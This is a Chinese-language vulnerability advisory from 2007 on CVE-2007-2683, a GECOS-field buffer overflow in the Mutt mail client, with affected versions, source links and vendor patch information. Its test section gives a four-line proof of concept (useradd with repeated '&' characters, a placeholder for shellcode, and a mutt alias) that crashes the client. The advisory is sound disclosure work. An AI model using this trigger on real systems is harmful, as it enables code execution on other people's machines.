发布日期：2007-05-28
更新日期：2007-05-29

受影响系统：

Mutt Mutt < 1.4.2.3

不受影响系统：

Mutt Mutt 1.4.2.3

描述：

---

BUGTRAQ  ID: 24192
CVE(CAN) ID: CVE-2007-2683

Mutt是一个小型但功能强大的基于文本的MIME邮件客户端。

Mutt在处理畸形格式的数据时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户系统。

Mutt的mutt_gecos_name()函数在处理GECOS字段中的&字符时存在缓冲区溢出漏洞，在试图扩展真实名称GECOS字段中的&字符时真实名称字符串的长度加上登录名称的长度可能大于256个字符，这就可能触发缓冲区溢出，导致执行任意指令。

<*来源：raylai
  
  链接：http://secunia.com/advisories/25408/
        https://bugzilla.redhat.com/bugzilla/long_list.cgi?buglist=239890
        http://dev.mutt.org/trac/ticket/2885
        https://www.redhat.com/support/errata/RHSA-2007-0386.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# USERNAME=$(perl -e 'print "a" x 31')
# useradd -c "&&&&&&&&& your-favourite-ascii-shellcode-here" $USERNAME
# echo alias billg $USERNAME >~/.muttrc
# mutt billg
Segmentation fault (core dumped)
#

建议：

---

厂商补丁：

Mutt
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://dev.mutt.org/trac/ticket/2885

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2007:0386-01）以及相应补丁:
RHSA-2007:0386-01：Moderate: mutt security update
链接：https://www.redhat.com/support/errata/RHSA-2007-0386.html

浏览次数：2845
严重程度：0（网友投票）